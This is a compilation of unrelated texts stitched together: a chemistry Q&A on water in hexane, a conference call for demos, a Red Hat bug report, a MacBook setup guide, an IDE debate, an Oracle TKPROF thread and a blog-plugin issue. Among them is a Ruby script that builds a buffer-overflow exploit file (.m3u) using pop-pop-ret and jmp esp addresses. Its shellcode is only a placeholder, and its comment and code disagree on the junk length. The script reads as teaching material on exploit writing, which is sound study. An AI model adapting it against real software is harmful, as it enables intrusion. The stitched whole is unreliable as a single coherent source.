So the number of molecules necessary for hydrogen bonding together to become more dense than hexane would be the number of water molecules dissolved at the maximum supersaturation point (maybe 0.0105%, +1 molecule) minus the number of molecules at the saturation point (0.01%). Now, having a saturated solution with water on the bottom of the container, adding another molecule of water would generally cause one of the other dissolved molecules to fall out of solution (because there is an equilibrium... some of the water molecules at the bottom are dissolving, while others are falling out of solution). Need we consider Brownian motion here? I think supersaturation is a moot point because it is usually achieved by raising the temperature of a solvent to allow more solute to dissolve before allowing the solvent to cool slowly. For hexane at 20 °C, it would be, as you pointed out, 0.01%. Then if you add a single water molecule above that limit it would probably float to the top. However, once enough molecules are added (around 6 I think) to create a solvation shell around a single water molecule, then the density of that 7H2O complex would be higher than hexane and it would sink to the bottom. @nova Supersaturation is practically achieved in the way that you described, but the solution would also supersaturate by delicately adding one molecule at a time. And again, they would all float due to surface tension... they would need to be physically pushed to submerge. Then they would be dissolved; then the hexane would force a bunch of the other molecules out of solution... like rain. Ok, good point. But my argument still stands for what happens once the supersaturated point is reached. Any additional molecules would begin to float up until enough amalgamate to create a sphere of hydration that would then sink. @nova They would not float. They are dissolved throughout the solution. At supersaturation, they would continue to be dissolved in solution.
Adding one more would cause a cascade of many water molecules to condense and precipitate. It seems like you assume that water is not soluble in hexane at all. This is incorrect. It is not miscible, but the solubility of water in hexane is 0.01% at 20°C. That is 100 mg/L or 5.5 mM, which is actually a decent amount of molecules. The distribution in the liquid in a beaker will be the same at all heights. A good question would be "what is the distribution of water molecules on the walls of the beaker and in the volume?" Beaker walls can accommodate a small amount of molecules. The extent of adsorption follows the Langmuir adsorption model. It can be ignored at high concentrations (mM of dissolved material), but starts playing a significant role when you go into the nanomolar or picomolar range. At those concentrations the actual amount of material in solution is significantly smaller than calculated because of adsorption. Suppose that you have a sealed beaker with some hexane liquid in it at room temperature. Now add one water molecule. The answer is obviously that the single water molecule will spend some time in the vapour phase and some dissolved in the hexane. Once the water molecule hits the liquid surface there is a chance that it will enter the liquid. If there is a strong interaction between the water and the liquid then the tendency will be to spend longer in the liquid than in the vapour. Hexane and water have a poor interaction: the hexane cannot effectively solvate a water molecule's dipole as it has no appreciable dipole itself and hence a small dielectric constant (relative permittivity)$^*$. The low dielectric constant of the solvent means that the electric field of the water's dipole can spread out over many hexane molecules, causing a positive interaction energy. Exactly how big is difficult to say. The water molecule can occasionally overcome any intermolecular interactions in the liquid phase as there is an exponential distribution of energies in all molecules at a finite temperature.
This is given by the Boltzmann distribution. Thus a few molecules have far greater energy than the average ($3RT/2$) and eventually these molecules will impart some of their excess energy to the water molecule and it will be ejected into the vapour phase. These processes will continually repeat themselves. Now if we consider this from a thermodynamic viewpoint, we will have to assume numerous water molecules in the presence of the hexane. We need to calculate the free energy, which consists of the enthalpy change $\Delta H$ and entropy change $\Delta S$ as in the formula $\Delta G=\Delta H -T\Delta S$. The enthalpy of water entering the hexane will probably be small and positive for reasons outlined above, but there is also an entropic factor. When two liquids are mixed, the (ideal) entropy of mixing$^{**}$ is $\Delta S= -R(n_1\ln(x_1)+n_2\ln(x_2))$, so its contribution to the free energy is $-T\Delta S= RT(n_1\ln(x_1)+n_2\ln(x_2))$, where $x_1$ is the mole fraction of water and $x_2$ that of hexane, and $n_1$ and $n_2$ are the respective numbers of moles. As the solubility of water in hexane is low, approx $10^{-2}$ molar if not smaller, the mole fraction of hexane can be approximated as 1 and $-T\Delta S\approx RTn_1\ln(x_1)$, which evaluates to approx -1 kJ/mol. The enthalpic (heat) term can be shown to be $(n_1+n_2)x_1x_2w$ where $w$ is an energy term allowing for the interactions between solute-solute, solvent-solvent and solute-solvent molecules, $w \approx 2\epsilon_{1,2}-\epsilon_{1,1}-\epsilon_{2,2}$, where $\epsilon$ represents an interaction energy. As the water-hexane interaction ($\epsilon_{1,2}$) is smaller than the hexane-hexane ($\epsilon_{2,2}$) and water-water ($\epsilon_{1,1}$) interactions, the interaction energy $w$ is positive. This means that the free energy for dissolving $\Delta G$ is going to be small and probably negative overall, and this means that the solubility is going to be small also.
As the amount of water increases, approaching the solubility limit, there will be microscopic regions of pure water and pure hexane until the water separates and, being the denser of the two liquids, forms the lower layer. In this situation water is dissolved in the hexane, to its solubility limit, and hexane also in water. The extent of solubility is given by Henry's law. The vapour pressure $P$ of a solute above a solution is given by $P= k_Hx$ where $x$ is the solute mole fraction and $k_H$ the Henry's law constant, which can only be determined experimentally and depends on solute/solvent and temperature. Values of $k_H$ (in units of bar) are several thousand for relatively insoluble solutes such as water in hexane or vice versa. $^*$ A low dielectric constant $\epsilon_0$ means that an electric field spreads a considerable distance $r$ from its source compared to a solvent with a high constant. The interaction energy scales as $\approx 1/(\epsilon_0 r)$; low-dielectric (alkane) solvents have $\epsilon_0$ in the range 2-4, whereas water is 78, so the effect is considerable. $^{**}$ Entropy is defined from statistical thermodynamics as $S=k_B\ln(\Omega)$, where $k_B$ is the Boltzmann constant and $\Omega$ the number of configurations available to the system. The calculation of the entropy starts by working out the number of ways of placing molecules into sites. Suppose that there are $N_1$ and $N_2$ molecules and that they can occupy in total $N_1+N_2$ sites. The first molecule can be placed in any of $N_1+N_2$ sites, the second in $N_1+N_2-1$ sites, etc. The total number of possibilities is $(N_1+N_2)!$. However, molecules of one type cannot be distinguished from one another, thus we must divide by $N_1!$ and similarly for $N_2$ by $N_2!$. This produces $\Omega=\frac{(N_1+N_2)!}{N_1!N_2!}$. Using Stirling's approximation for factorials, the equation for $\Delta S$ can be obtained. This is the answer to the previous version of the question, which had ethane instead of hexane.
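For completeness, the Stirling step alluded to in the second footnote can be carried out explicitly (using $x_i = N_i/(N_1+N_2)$ and $\ln N! \approx N\ln N - N$):

```latex
\ln\Omega = \ln(N_1+N_2)! - \ln N_1! - \ln N_2!
          \approx (N_1+N_2)\ln(N_1+N_2) - N_1\ln N_1 - N_2\ln N_2
          = -N_1\ln\frac{N_1}{N_1+N_2} - N_2\ln\frac{N_2}{N_1+N_2}
          = -N_1\ln x_1 - N_2\ln x_2
% hence, with S = k_B \ln\Omega and n_i = N_i/N_A:
\Delta S_{mix} = -k_B\left(N_1\ln x_1 + N_2\ln x_2\right)
              = -R\left(n_1\ln x_1 + n_2\ln x_2\right)
```

Since both mole fractions are less than 1, both logarithms are negative and $\Delta S_{mix}$ is positive, as expected for mixing.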
Ethane is a gas, did you mean hexane? Assume that your beaker is sealed but in thermal contact with the outside, i.e. sitting on the bench. On adding a single water molecule, the thermal energy of the ethane will impart its energy to the water and it will be found in the gas phase. If you keep adding water the same thing happens, but eventually liquid water will form at the bottom/sides of the container in equilibrium with water vapour; the rate of evaporation equal to the rate of condensation. Adding more water will allow more ethane to dissolve as the water volume and gas pressure increase in the container (as it is sealed). Some small amount of the ethane will also dissolve in the water. The amount is determined by Henry's law. Changed ethane to hexane. Typo.
STACK_EXCHANGE
Interactive Tools and Demos Call for Participation as part of the 2019 CSCL Conference Interactive Tools and Demos Track: Description and Objectives - Karim Sehaba (University of Lyon 2, France) - Yannis Dimitriadis (University of Valladolid, Spain) - Pierre-Antoine Champin (University of Lyon 1, France) Interactive tools and demos are intended to enable participants to experiment with new interactive devices and environments for teaching and learning, explore designs for collaborative activities, or to try out and compare methods for research and practice. Submissions should preferably cohere with the conference theme “4E learning: Combining Embodied, Enactive, Extended, and Embedded Learning in Collaborative Settings”. See the main submission page for a description. Submissions may be of two types: Classic Interactive Demo and Special Interactive Session. The Classic Interactive Demo is targeted at two groups. The first are researcher-developers who would like to showcase their interactive tools, get feedback, and find collaborators with whom to develop projects. The second group are researchers who would like to demo applications of existing technologies in specific CSCL contexts. In this category of classic interactive demos, the chosen submissions will be given space during the poster sessions. Interactive tools that speak in some way to the 4E theme will be given priority. The Special Interactive Session is also targeted at the same two groups as above, but the objective is different. We plan to build a special session from the submissions, which will have an extra slot in the program, and where participants will discuss the extent to which a particular tool or tool-based method has a built-in underlying theoretical stance, and what the consequences of such a stance are. How do epistemological positions regarding learning and collaboration influence tool design? How does the vision of the role the individual plays in the group influence tool design?
What does harmonizing a tool’s development with a theoretical approach or an epistemological position bring to a research program? And on the contrary, to what extent can a tool be theory-free? Alternatively, can the same tool or tool-based method function with different underlying theories? What are the advantages for such a research program? Finally, what are the advantages of pragmatic approaches that are driven by new technological possibilities? The number of classic interactive demos we accept for showcasing during the poster sessions will be limited by submission quality and available physical space. We intend to accept four submissions for the special session, for which contributors take position regarding the questions above. The idea is to organize three consecutive time periods within the session: 1) presentations of position statements, 2) interactive work with the four demos, and 3) general discussion, potentially geared towards publishing in IJCSCL. Please direct any questions to the Interactive Tools and Demos co-chairs at (firstname.lastname@example.org). Please submit a short paper (not to exceed 4 pages) here. It should follow the current version of the ISLS author guidelines (there is also a Microsoft Word template). The abstract should note whether you are submitting to the classic or special interactive session (see above). The paper should be written with the reader of the conference proceedings in mind, who may be reading the description after the event has taken place. The structure of the 4 pages is flexible, but it is suggested that the submission describe the concept, motivations, and significance for CSCL and in particular for the 4E Learning theme: Combining Embodied, Enactive, Extended, and Embedded Learning in Collaborative Settings. In both cases (classic interactive demo or special interactive session), include a description of your technological setup.
If your submission is accepted, and you need specific equipment that you cannot bring with you, contact the co-chairs at email@example.com as soon as possible in order to see how this can be organized. If you are submitting to the special interactive session, then you should take position on the statements above, in the section entitled The Special Interactive Session. Important Dates for Interactive Tools and Demos January 15, 2019 – Applications due (https://new.precisionconference.com/cscl) February 28, 2019 – Notification of acceptance March 15, 2019 – Submission of the final 4-page summary for publication in conference proceedings
OPCFW_CODE
#!/usr/bin/env ruby
require 'rainbow'

=begin
We know that we need 26094 bytes before overwriting EIP, and that we need 4 more bytes before we are at the stack address where ESP points at (in my case, this is 0x000ff730). We will simulate that at ESP+8, we have an address that points to the shellcode. (In fact, we’ll just put the shellcode behind it – again, this is just a test case.)

26094 A’s, 4 XXXX’s (to end up where ESP points at), then a break, 7 NOP’s, a break, and more NOP’s. Let’s pretend the shellcode begins at the second break. The goal is to make a jump over the first break, straight to the second break, which is at ESP+8 bytes = 0x000FFD38. To get the value of ESP+8 into EIP (and to craft this value so it jumps to the shellcode) I will use the pop pop ret technique + the address of jmp esp!
=end

file = "pop_pop_ret.m3u"

junk      = "A" * 26064             # misc junk up to the saved return address
eip       = [0x01b56a10].pack('V')  # pop pop ret from MSRMfilter01.dll
jmp_esp   = [0x01CCF23A].pack('V')  # address of a jmp esp instruction
append    = "XXXX"                  # 4 bytes so ESP points at the NOP slide | 000FFD34 58585858 XXXX
nops      = "\x90" * 8              # short NOP slide
shellcode = "\xcc" + "\x90" * 500   # placeholder shellcode (int3 break + NOPs)

# concatenate all the pieces and write the full payload to the .m3u file
payload = junk + eip + jmp_esp + append + nops + shellcode

File.open(file, 'w') { |f| f.write(payload) }

puts
puts " pop_pop_ret.m3u file created!\n\n\n".foreground(:red).bright.blink
STACK_EDU
I have been running RedHat 6.0 for a number of months. Last week I applied a number of security and recommended patches to my system. I obtained those patches from the RedHat web site. Among those patches was the full suite of XFree86 3.3.5 rpm's. (I also applied Gnome, CDE, netkit, termcap, rpm, telnet, and traceroute patches; I can provide a full list.) Starting on the weekend, my system started logging SCSI errors of the form: Oct 5 04:02:47 willow kernel: SCSI host 0 abort (pid 142691) timed out - resetting Oct 5 04:02:47 willow kernel: SCSI bus is being reset for host 0 channel 0. One symptom for me seems to be that StarOffice has twice now locked up completely. The process is defunct, and not killable. I rebooted once, and ended up having to manually fsck to clean up the disk. The reason I suspect XFree86 is that when looking through deja.com I found several postings by Randall J. Parr (one in comp.os.linux.x under the title "bug/conflicts in XFree86 3.3.5 on RH6?" dated Sep 23/1999). He detailed quite well an almost identical situation, only he had done a better job of tracking it down to XFree86. His solution was to downgrade to version 3.3.3. I emailed him and he replied that he has not received a single other response to his several usenet postings. I thought I should try submitting an official bug report, in case this really is something new to you guys. I checked what I could on the redhat support pages and couldn't find anything. For completeness, I have an Intel PII-350, ASUS P2B motherboard, Adaptec 2940UW SCSI card, Yamaha CRW4416 CD-RW, and Seagate ST34520W SCSI hard disk. The other system hardware should be irrelevant, but to cover everything, the video card is an 8MB AGP ATI Xpert98. uname -a reports kernel version 2.2.5-22 #1. Thank you for your attention. This is a symptom of faulty hardware, not of bad software. There is NO WAY that XFree86 can cause bad interactions with the SCSI bus. Maybe your hard drive is
OPCFW_CODE
New mac, hu dis? 😉 I left Microsoft and started at the new gig a little under two months ago, where they handed me a MacBook to work on. Now, while I've used MacOS in the past, my 2014 MacBook Pro has been running Windows for the past eight years, so I had to get my bearings and relearn a few things. Going back and forth between the OSes wasn't fun either. So, to me, the decision here was a no-brainer: aging desktop and laptop machines that are long overdue for a refresh, M-series chips being as good as they are, and being tired of having to maintain an at-home and an on-the-go setup.. it was time to switch my personal computing life to MacOS by picking up a MacBook Pro. This page has some of the apps I've got running and settings tweaks I've made on my machine to help make that transition a bit easier. If you have any tips or tricks of your own, or suggestions for things I should check out, then hit me up on Threads: @shaykalyan! 14" MacBook Pro with the baseline M2 Pro, 32GB of RAM, and a 512GB SSD for storage. I also grabbed a CalDigit TS3 Plus dock to plug in my monitors and peripherals, which makes it a super easy swap of a USB-C connection between my work machine and my personal one. Outside of the typical programs we'd all be installing, like your favourite web browser, these are some apps that I'm finding to be essential on MacOS. - Rectangle app: window snapping/tiling. A pro tip here is to set up shortcuts similar to Windows, e.g., CTRL + ⌘ + <arrow key> for left, right, and maximizing of windows. - TextPal: emojis at your fingertips! This has autocomplete prompting with a shortcut of your choosing to activate. - Shottr: powered-up screenshots and annotating. The built-in screen capture support is fine, but this lets you perform markup and other edits pretty easily, and have it all go straight to your clipboard — zero faff. - Kap: easy video capture and processing out to gifs. - Maccy: clipboard manager.
There are quite a few options out there, but I find this to have the least intrusive UX. It also has support for pinned (permanent) items and non-text content like images. - Flow: a simple and effective menu bar based pomodoro timer. - Hidden Bar: simple app to hide the overflow of icons along the menu bar. If you need more control/flexibility, there's also the paid Bartender app. - Itsycal: cute little monthly calendar in your menu bar that shows upcoming events. I've synced my Google calendar with the built-in calendar app for it all to show up effortlessly in this! - Meeting Bar: integrates with calendar and meeting services like Zoom so you can see your upcoming meetings and launch right into them with one click. - Aerial: beautiful screensavers like what you'd get on Apple TV. Though the latest MacOS Sonoma is meant to bring some of that natively! - AlDente: a battery charge limiter app that lets you set a charge limit, e.g., 70%, after which the laptop will use the power supply. I find it especially important for my case where I'll primarily be using my laptop docked at home and want to maintain its battery capacity and health for as long as possible. MacOS does have an option to limit the charge at 80%, but it only goes into effect after it "learns" from your usage, and for some people that never ends up working! There's enough discourse online around whether apps like this one are necessary, and from what I've read, it seems to work as advertised for keeping battery cycles low and overall health high, e.g., Reddit discussion one and Reddit discussion two. Lots of out-of-the-box defaults that don't jibe with me.
- Sharing > Make sure all sharing is disabled and update the computer name - Show scroll bars: - Battery > Show Percentage: Display and Dock - Automatically hide and show Dock: - Default web browser: - Show recent applications in dock: - Keyboard navigation: - Keyboard Shortcuts > App Shortcuts > All Applications > type in Emoji & Symbols in the input box and pick your shortcut, e.g., ⌘ + . to pop up the emoji panel! - Input Sources > Edit > Capitalize words automatically: - Input Sources > Edit > Add period with double-space: - Input Sources > Edit > Use smart quotes and dashes: - Input Sources > Edit > Use " for double quotes - Input Sources > Edit > Use ' for single quotes - Point & Click > Secondary click: Click or Tap with two fingers - Point & Click > Tap to click: - Scroll & Zoom > Smart zoom: Disable (removes the lag on the two finger secondary click!) - More Gestures > App Exposé: Swipe down with Three Fingers - More Gestures > Launchpad: Some minor tweaks here: - General > set home directory as default - Tags > disable these to remove clutter As for moving around the directories, these shortcuts are handy to know: ⌘ + Shift + G: Navigate to a path ⌘ + Option + C: Copy an item's path to clipboard - You can also hold the Option key while looking at the context menu ("right click") of an item in Finder to reveal alternative selections, including having the Copy <item> as Pathname Enable the app switcher on all displays instead of only showing it on the screen where the dock was last used (source link) defaults write com.apple.dock appswitcher-all-displays -bool true Enable repeated keys on press and hold, instead of accessing symbol/accented characters (source link) # global setting or a specific app, then restart the machine/app defaults write -g ApplePressAndHoldEnabled -bool false # defaults write <com.company.app> ApplePressAndHoldEnabled -bool false There's already a lot of good info out there for developer tooling and apps, but I'll quickly jot a couple of
things down here for future me. iTerm2, a terminal alternative. I set this up Quake-like with a hotkey to bring up the terminal as an overlay at the top of the screen: - Appearance > General > Exclude from Dock and ⌘ + Tab Application Switcher: - Appearance > Tabs > Show tab bar even when there is only one tab: - Profiles > [Your profile] > Window > Style: Full-width Top of Screen - Profiles > [Your profile] > Keys > Key Mappings > Presets: Natural Text Editing - Keys > Hotkey > Show/hide all windows with a system-wide hotkey: - Keys > Hotkey > Hotkey: SHIFT ⌘ ` brew install git brew install --cask git-credential-manager brew install --cask sublime-text brew install --cask visual-studio-code I'm sure my setup will evolve over time so I'll try and keep this page updated over the next little while! 2023/10/15: Added note on disabling Smart zoom
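A footnote on the brew install list above: Homebrew can record and replay a whole setup like this via brew bundle, which reads a Brewfile from the current directory. A hypothetical Brewfile covering some of the apps mentioned on this page (the cask names follow Homebrew's naming and are worth double-checking before relying on them):

```ruby
# Brewfile — hypothetical; install everything with `brew bundle install`
brew "git"
cask "git-credential-manager"
cask "sublime-text"
cask "visual-studio-code"
cask "iterm2"
cask "rectangle"
cask "maccy"
cask "shottr"
```

Keeping this file in a dotfiles repo makes the next machine migration a one-command affair.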
OPCFW_CODE
Should every member of a team use the same IDE? Do you think it makes sense to enforce that every member of a team must use the same IDE? For instance, all engineers that are already on the team use IDE X. Two new engineers come and want to use IDE Y instead because that's what they have been using for several years now. Do you have any experience with "mixed IDE" teams? If so, what is it? The problem I've often had with mixed-editor environments is auto-formatting of code and treatment of things like tabs. As long as you get all that straight, it won't matter much. Provided the 'official' build system (as used by the Continuous Build servers) is the same for all, I don't see any reason why each member of the team could not choose the tools they want... I'd add that if the official build system depends on an IDE, there is a problem. At the place I work, about 25% of the people use Visual Studio, 50% use an internally developed IDE, and the last 25% don't use an IDE at all, preferring to use Notepad++, Vim, or Emacs. This has never been a problem, so long as everyone builds the same way. When you spend a lot of time at other team members' desks it can be annoying figuring out their setup before you can help them. OMG!!! An internally developed IDE??? That is a recipe for disaster, like an internally developed bug tracking system. @Job, I work at Microsoft, so strictly speaking VS is also an internally developed IDE. We also use internally developed bug tracking systems... TFS and Product Studio :). It's fine as long as everyone can support themselves. If you're the only person on your team who uses XYZ and you're having a problem nobody else is (or worse, everyone else has problems with files you check in), you need to be able to fix the problem on your own. @JSBձոգչ TFS... that is a recipe for disaster ;) If your team relies on certain plugins available only to certain IDEs, then it only makes sense to unify everyone under the same development platform.
I also find it easier to help someone with a development issue if they have the same IDE as me, whereas if I'm to read someone's screen with an unfamiliar interface it'll take a bit longer. If your team relies on an IDE plugin for anything non-trivial, you already have bigger issues. @HedgeMage Only a Sith deals in absolutes. E.g. what if the project is based on the Eclipse Platform? I don't know what the current state is, but a couple of years ago IntelliJ was incapable of doing sophisticated validation and such for Eclipse plugin metadata. We had a developer on the team who insisted on IntelliJ - more than once checking in broken code. One downside is that when pairing you can't swap the keyboard between you as fluently. Between mainstream IDEs this is probably not a huge problem, but if one person is used to Eclipse while the other is used to vim, there is going to be a mismatch. The Eclipse user may well be entirely unable to use vim, while the vim user (that's me ;) spends a lot of time cursing under their breath at the horrible slowness of using vanilla Eclipse. That said, I'd still much rather use vim myself. Provided your pair are happy with just one of you "driving" for extended periods it works OK. And I know there are plugins to make Eclipse work like vi, but I'm talking about pairing where I go and sit with someone who has Eclipse working as they like it, so they won't be installing that plugin. It would make no sense at all to force every developer of the Linux kernel to use the same IDE (or use any IDE at all). I don't have experience with mixed IDEs, unless you count a commercial IDE occasionally supplemented by a text editor as "multiple IDEs," but I can think of a couple of pros and cons. Pros Each developer can be most productive with what they know best. Some IDEs may provide an advantage over others (one might be better at refactoring, another might be better at providing coding aids, others might be better with data integration, whatever).
Using a blend might allow your team to capitalize on that. You'll have a bit of a hedge against the possibility that one of the IDEs goes defunct. Cons: Licensing issues. If there are multiple commercial IDEs involved, maybe it's more expensive. At the least, it could be more to keep track of. Licensing issues 2: If there are frameworks or plug-ins that are licensed by IDE or language, will this be a problem? As Dszordan mentioned, certain plug-ins may not be compatible with the different IDEs. If the IDEs have code generation components or style formatting engines that do things differently, this might cause some confusion. Today's developer wants to choose their own tools. This has changed over time, though. 10 or 15 years ago there weren't as many choices at places where I've worked (yes, there were lots of editors, but they weren't a 'choice'). The shop that I worked at 15 years ago was very 'old school' (even then!) and vi was the editor. No choice. This was actually pretty useful, because after the first month of cussing and swearing I actually got to like it. Today, there are many choices and each has many advantages. In my personal experience I used an IDE - RubyMine - for a couple of years before switching 'back' to vi(m). I did this because Ruby is a very hard language to write an IDE for (duck typing and other dynamic features), and as a result IDEs tend to be slow and/or require the latest, fastest machine. There is a reason for which this can be forced. Simply consider Visual Studio and emacs/vim. On Windows, Visual Studio will add an extra \r at the end of the line. This messes up the display in emacs/vim. Tabs create problems too. The problem with us is that we developers work in Linux but our software architect is comfortable in Visual Studio. He once cursed us, saying that we do not format the files properly. But then when he found that this was because of a default settings issue, we all agreed on the same format.
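A common way to get the line-ending and tabs questions "straight" across mixed editors is a shared settings file checked into the repository. EditorConfig is one widely supported option (it postdates this 2010 thread, and support in some editors requires a plugin); a minimal sketch:

```ini
# .editorconfig - checked into the repo root; most modern editors and
# IDEs (Visual Studio, vim, Emacs, IntelliJ) honor it natively or via
# a plugin, so formatting no longer depends on each person's editor.
root = true

[*]
end_of_line = lf              # avoid mixed \r\n vs \n across Windows/Linux
indent_style = space          # settle the tabs-vs-spaces argument once
indent_size = 4
trim_trailing_whitespace = true
insert_final_newline = true
```

This addresses the formatting complaints directly without forcing anyone onto a particular IDE.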
If anyone forces me to use a particular IDE, I will not feel bad. Whatever is good for the team, I will respect that and will compromise accordingly. You are confusing a code formatting standard with IDE usage. If you decide to use 3 spaces for your indentation level, you can set that in Visual Studio or Emacs (I know, I use them both). Other issues, such as the different line endings in Windows, Macs, and Unix, could be solved by custom check-in/check-out scripts, à la if OS == Windoze ... Switching IDE because you don't know how to set spaces/tabs in the one you are using is unfortunate. Also, a boss cursing you without knowledge is not a good thing. This feels more like an anecdote than an answer, though. The opening sentence doesn't make sense to me other than essentially saying that ignorance of settings might be a reason. Note also that this is from 2010. Things have changed in 11 years. I don't think everyone needs to have the "same" IDE, but it would be nice if everyone had a "supported" IDE. For example, if your IDE is integrated into the code review process as far as commenting and updating code goes, then it would make sense for everyone to be on a supported platform. If your company is using a collaborative environment such as Rational Team Concert and one or two guys want to use an unsupported IDE (or a different version) while everyone else uses compatible ones, then life may be difficult for the people who have chosen to be outside of the support loop. If everyone wants to, that's fine, but different people might want to use different editors/IDEs. I wouldn't really want people to force me to use an editor other than my preferred one if I were working on something big with a team, and I doubt I'm alone. People may be most happy with the situation if you don't force them to use a particular editor. BTW, Emacs! Well, yes, I have some experience in that regard, having been part of a mixed Windows/Unix & C++/Java team.
I think this is not an issue provided either everyone is comfortable working with the other IDE, or there is never going to be a situation when anyone who is not familiar with IDE Y needs to work on the other guy's (that is, the guy with IDE Y) system. At our place we build our projects using Visual Studio. When it comes to editing text, I switch to Emacs. Your company shouldn't care as long as the work is done. Sounds a bit like "we used this at my old job". Well, they aren't at their old job. If it doesn't affect your tool chain or source control plug-ins, then maybe yes. Then again, can the two new folk demonstrate a clear benefit? Have they used your IDE? Otherwise, I have no patience with this nonsense unless there is a good case for it. They aren't at their old job: it couldn't have been that good for them to want to leave. Was using the other IDE the only highlight in their old job? If so, they should STFU and be grateful. Shouldn't people's preferences matter to a workplace? Is preference nonsense? Isn't a programmer's satisfaction a benefit to the company? I am sorry, but this doesn't "compile" for me. @daramarak: Where does this cross into arrogance or being a prima donna, especially for larger shops with a corporate standard? Remember: new guys walking into a new company saying "we want this" is arrogance. YES! Enforce a singleton IDE. It causes problems when the project dependencies change. If someone introduces a new dependency to the project, then everyone will waste time introducing that new dependency, and some might fail and waste time in the process. HUGE WASTE OF TIME. There should be a REALLY good justification to add a different IDE to the team, meaning the saved time should surpass the time dedicated to migrating the system to different IDEs. An IDE is really an editor. In no way does an editor constitute a project dependency.
(I'm aware that this answer may have been sarcastic; however, this is not the place for sarcasm.) An IDE is not really just an editor, because you don't use "Notepad.exe". You need the extra work done by the IDE, and IDEs don't have standards, which makes it difficult to use external tooling. And if you meant that a hex editor is just a "text editor", then code is not just text. The IDE really is just an editor, with a bunch of other tools, the vast majority of which can be called on the command line anyway. I don't get people here. They say an internal IDE is bad, and a uniform IDE is bad. So the IDE should be uniform for all programmers, but not for all programmers that work on the same project? HUH?! I DON'T GET IT! It's just a tool. Any competent programmer should be able to utilise their tools appropriately, and if they feel that a different IDE is more suitable for how they do development, then they should do so. @Arafangion, that's half an answer. Why do people here think that using a unique tool is bad (the first part you didn't answer), while also thinking that using a unique tool is fine (that is the second part you did answer)?
One of our applications is running slowly, and we believe that it is the application causing it, not the database. I have just traced and TKPROF'd a session in one of our Oracle databases to establish how the code is being interpreted, whether or not it is using its indexes, and how long it is taking to process. The results seem fine to me: hardly any CPU/elapsed time, and the explain plan shows that the system is making use of indexes, etc. I do, however, have some queries regarding my output. Does anybody know: Why are some statements parsed numerous times? Why do statements need to be executed a number of times to pull out the desired data? Can you also please tell me what the difference between a recursive and a non-recursive statement is? Thanks in advance 05-03-2001, 06:01 AM Dear Suresh, 3rd May 2001 14:10 hrs Chennai Here is a link for recursive and non-recursive calls. Regarding the number of calls, the reasons are as follows. When you issue a SELECT, UPDATE, DELETE, or INSERT and the object's information is not available in the data dictionary cache, a recursive call will happen. Also note that in the TKPROF file, the overall cumulative recursive and non-recursive totals given at the bottom are for ALL STATEMENTS executed from the start of the session until you end tracing. So you should not think that the PARSE, EXECUTE, and FETCH counts are high for a single statement; earlier in the TKPROF file, those counts are stated per statement. 05-03-2001, 09:26 AM Thank you for your reply, I now understand recursive/non-recursive - however: When TKPROFing, I set the argument sys=n so that system SQL statement statistics would not be shown. I can still see that some statements were parsed a number of times, 9/10 times - do you know why? Also - how can I get the system to use array fetching, as I have noticed that a fetch is issued for each row retrieved.
Thanks in advance 05-03-2001, 09:59 AM One way that I have seen this happen before was when there was code where queries were executed within some sort of LOOP structure. The query would be built, parsed, executed, and fetched within the LOOP. A value would be retrieved, and then the next iteration of the loop would occur, where the query would get rebuilt, parsed, executed, and fetched. To resolve that, I changed the code to use dynamic SQL, moved the parse call outside of the loop, and then used bind variables to change the query values within the loop, so that all that was needed was to re-execute the query and fetch the new rows. I hope that made sense. I have no idea if this applies to what you are seeing, because it's a little hard to determine without understanding your application or seeing your queries. But you asked how this could happen, and this is one cause that I have seen. :) 05-03-2001, 10:35 AM sys=no: ignore recursive SQL statements run as user SYS. Hi, 3rd May 2001 19:57 hrs Chennai I understand your first doubt. Try executing the same query like so:
alter session set sql_trace=true;
select * from emp;
alter session set sql_trace=false;
Now look at the output file each time and tell me what happened to the number of parses. Each time you run TKPROF, execute a standard SQL statement as mentioned above, but the first time let it be against a new table, and the other two times use the same query. Note: SYS=NO ==> ignore recursive SQL statements run as user SYS. Let me know what you understood from the above results. You will find that, by the last run, the parse, execute, and fetch counts have become 0,0,0 for the recursive statements.
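The loop advice above - parse once outside the loop, then re-execute with bind variables, and fetch rows in batches - is the same pattern in any database API. Here is a minimal illustration using Python's sqlite3 as a stand-in for Oracle (the table and values are made up, purely to show the pattern):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp (empno INTEGER, ename TEXT)")

# Bad pattern: the SQL text changes every iteration, so the database
# sees a brand-new statement to parse on each pass through the loop.
for empno in range(1, 4):
    conn.execute(f"INSERT INTO emp VALUES ({empno}, 'name{empno}')")

# Good pattern: one statement with bind variables (?), parsed once;
# only the bound values change on each execution.
rows = [(empno, f"name{empno}") for empno in range(4, 7)]
conn.executemany("INSERT INTO emp VALUES (?, ?)", rows)

count = conn.execute("SELECT COUNT(*) FROM emp").fetchone()[0]
print(count)  # 6

# Array fetching: pull rows in batches instead of one fetch per row,
# which is what the original poster was asking about.
batch = conn.execute("SELECT empno FROM emp ORDER BY empno").fetchmany(3)
```

In Oracle clients the same idea shows up as bind variables plus an array-fetch (prefetch) size setting, rather than one round trip per row.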
blog.permalink gets confused with the {title} As far as I understand, blog.permalink should allow building the final URL in whichever format is desired, also using frontmatter properties. However, no matter whether I use {title} or :title, the final permalink title always corresponds to the filename. Let's say a default source filename format is %Y-%m-%d-something ... the title in this circumstance is the filename and not the value in the front matter. It would be good to rename this to "filename", leaving "title" (which is likely to be used in the frontmatter) for what the word really implies. Just to add something else: according to the link below, a slug should already be produced when :title is used. http://www.rubydoc.info/github/middleman/middleman-blog/Middleman%2FBlog%2FBlogArticle%3Aslug Hiya, Thanks for sending in your report. To further aid in finding the issue, can you please supply either a full repository that mimics your issue, or at least a GIST of the config.rb file and an explanation of what steps to take to replicate this. Thank you. Hi Ian, Below is the config.rb for my project.
```ruby
activate :i18n, :mount_at_root => false, :templates_dir => "content", :locales => [:en, :it]

activate :directory_indexes

activate :autoprefixer do |config|
  config.browsers = ['last 2 versions', 'Explorer >= 9']
end

set :markdown, auto_ids: false
set :markdown_engine, :kramdown

activate :blog do |blog|
  blog.name = "blog"
  blog.prefix = I18n.locale.to_s + '/blog'
  blog.permalink = "{category}/:permalink"
  blog.layout = "Blog-inner"
  blog.summary_separator = /(READMORE)/
  blog.summary_length = 390
  blog.generate_day_pages = false
  blog.generate_month_pages = false
  blog.generate_year_pages = false

  # Enable pagination
  blog.paginate = true
  blog.per_page = 6
  blog.page_link = I18n.t(:blogPageLink) + "-{num}"
end
```

As for the repository, I'm not sure I can share that one that easily, but have a look at the screenshot below that shows the structure of my blog posts. And here is the front matter of one of them:

```yaml
---
date: 2015-03-03
cssLayout: blog
category: test
tags: test
title: "Keep going with the development"
permalink: "ciao"
